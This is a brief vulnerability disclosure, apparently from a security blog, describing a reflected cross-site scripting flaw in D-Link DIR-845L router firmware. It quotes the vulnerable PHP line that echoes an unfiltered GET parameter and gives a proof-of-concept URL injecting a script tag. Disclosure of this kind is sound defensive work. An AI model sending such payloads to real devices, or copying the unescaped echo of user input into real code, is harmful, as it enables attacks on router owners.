D-Link DIR-845L router is vulnerable to Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php.
D-Link DIR-845L routers version 1.01KRb03 and below are vulnerable to Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php
.
Vulnerable Component
/htdocs/webinc/js/bsc_sms_inbox.php
Technical Details
The vulnerability is due to the lack of filtering in the parameter $_GET["Treturn"]
which is directly used in code on line 17 of bsc_sms_inbox.php
.
The vulnerable code snippet:
var get_Treturn = '`<?if($_GET["Treturn"]=="") echo "0"; else echo $_GET["Treturn"];?>';
PoC
http://IP:8080/bsc_sms_inbox.php?Treturn=%27%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E
What do you think?
It is nice to know your opinion. Leave a comment.